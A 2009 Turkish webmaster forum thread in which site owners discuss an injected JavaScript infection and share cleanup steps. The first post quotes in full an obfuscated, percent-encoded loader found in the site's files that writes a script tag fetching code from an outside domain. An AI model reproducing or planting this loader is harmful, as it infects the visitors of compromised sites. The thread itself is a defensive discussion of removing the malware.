Gecenlerde bir kaç Avast kullanıcısından aldığım uyarıyla dosyaları inceledim.
Js dosyalarında farklı kodlar gördüm. Veritabanında ki tüm dosyaları tek tek arattırdım ve tüm yeni kodları sildim. Bakmadığım dosya kalmadı. Çoğu avast kullanıcısında artık uyarı vermiyormuş ama bazılarında hala veriyor ve sitemin kaynak kodunda dosyalarda bulduğum kod hala duruyor. Bu kodu hiç bir dosya içerisinde bulamadım.
Kod şu şekilde:
Kod:
function(){var wQRT='va.72.20a.3d.22Scri.70tEn.67.69n.65.22.2cb.3d.22Ver.73.69on()+.22.2cj.3d.22.22.2cu.3d.6ea.76igator.2euserAg.65nt.3bi.66((.75.2e.69.6e.64exO.66.28.22Win.22).3e0).26.26(u.2e.69n.64exOf(.22.4eT.206.22.29.3c.30).26.26.28.64.6fcume.6et.2ecook.69.65.2eindexO.66(.22miek.3d1.22).3c0).26.26(typeo.66(.7a.72vzts.29.21.3dtypeof(.22.41.22))).7bzrvzts.3d.22.41.22.3b.65val(.22if(window.2e.22+.61+.22.29j.3dj+.22+a.2b.22.4dajo.72.22+b+a+.22Mi.6e.6fr.22+b+.61+.22Build.22.2bb.2b.22j.3b.22).3bdocu.6d.65nt.2ewr.69.74e.28.22.3cscr.69.70.74.20src.3d.2f.2fgumb.6car.2e.63.6e.2f.72s.73.2f.3fi.64.3d.22+.6a+.22.3e.3c.5c.2fscript.3e.22).3b.7d';var W4z=wQRT.replace(/./g,'%');var dHFP=unescape(W4z);e v a l(dHFP)})();
Kayıt: Jun 14, 2006 Mesajlar: 190 Konum: weStanbuL
Tarih: 2009-05-15, 02:32:43 Mesaj konusu:
Anlat kardeşim.
benim siteme de ve aynı ftp den girdiğim için doğal olarak diğer siteme de virüs mü trojen mi herneyse bi sekilde girdi ve ben sildikce kendini yeniliyor.
index.php nin hemen yanına geliyor ve hiç dokunmazsam zamanla o kod uzuyor da büyüyor.images klasörlerinin içerisine image.php atıyor.
Bunlar olduktan site ve içerisindeki tüm modullere aynı geçiyor ve sitenin yavaslamasına google nin siteyi saf dısı bırakmasına neden oluyor.
Bunun yüzünden Sandbox'a mı düştüm bilemiyorum.Bu düşüncemin sebebi Google' da ileride oldugum tüm kelimeler kalkmış durumda.Günlük %80 oranında hit kaybetmeme sebep oLdu.
inşallah buluruz bi çaresini.
O zaman ben nasıl kutrulduğumu anlatayım, sizde ona göre yaparsınız. Ama bana bulaşan Js Redirector-H4 trojeniydi.
Tüm FTP'yi indiriniz. Öncelikle bilgisayarınıza Kaspersky yada kendi tercih ettiğiniz bir antivirüs varsa kurunuz. Güncellemeleri yapınız. Ardından Combofix yükleyiniz.
Combofix'i buradan yüklüyebilirsiniz:
Antivirüsünüzü kapatın ve Combofix i masaüstüne atıp çalıştırın. Çıkan uyarıların hepsine evet diyerek ilerleyin. Combofix taraması bittikten sonra Dracula Virüs temizleyicisini çalıştırınız. Onu da buradan indirebilirsiniz:
Bu işlemler bittikten sonra antivirüsünüzü tekrar aktif edin ve tam tarama yapın.
Virüs tarama işlemleri bittikten sonra kurmamız gereken bir program daha var o da : Editplus kod düzenleyicisi. Kendi adreslerinden edinebilirsiniz: http://www.editplus.com/
Öncelikle inculudes içindeki ".js" uzantılı dosyaların kodlarına bakınız. Js uzantılı dosyanıza bulaşışsa bu kod en altta java script olarak gözükecektir. Mesela bu kod
Kod:
function(){var wQRT
olarak gidiyorsa "function(){var wQRT" kısmını kopyalayın. Editplus programını acarak "Searc - Find In Files" sekmesini tıklayın.
Find what kısmına function(){var wQRT yapıştırın.
File tip kısmına *.* yazınız.
Folder seceneğinden indirmiş olduğunuz FTP dosyasını seciniz(puplic_html)
Alttaki seceneklerden Include Subfolders ı tıklayıp aratmaya başlayın.
Kendini enjekte ettiği tüm dosyaları göreceksiniz. Hangi dosyalarda olduğunu buldukdan sonra o dosyaları tek tek düzenleyip kodları siliniz.
Keşke iş bu kadar basit olsa. Bu bana bulaşan virüs öyle illet bişeydi ki kendini her dosyada farklı bir şekilde kodlamış. Diğer js leri de kontrol edip eğer kendini farklı bir şekilde kodlamışsa onlaıda aratıp bulup siliyoruz.
Js dosyalarında kendini en alta kodluyor. Tüm Jslerle işimiz bittikten sonra Html dosyalarına da göz atın. Ama Js ye yerleşen kodla aynı olduğu için zaten o da aramada çıkıyor.
Şimdi gelelim .php dosyalarına. Bulaşan kodu bulmanın en kolay yolu modules klasöründe ki modullerin index.php sini kontrol etmektir. Eğer ilk satırda ki <?php den sonra herhangi bir kod varsa bu kodu kopyalayın ve tüm dosyalarda aratın. ve <?php satırındaki tüm kodları siliniz.
Tüm kodları temizledikten sonra FTP şifrenizi değiştirin ve temizlediğiniz dosyaları FTP ye gönderiniz.
Ben bu anlattığım şekilde kurtuldum. Umarım sizinde işinize yarar
Bu forumda yeni başlıklar açamazsınız Bu forumdaki başlıklara cevap veremezsiniz Bu forumdaki mesajlarınızı değiştiremezsiniz Bu forumdaki mesajlarınızı silemezsiniz Bu forumdaki anketlerde oy kullanamazsınız
Arama
Rütbeliler
Profil
Giriş
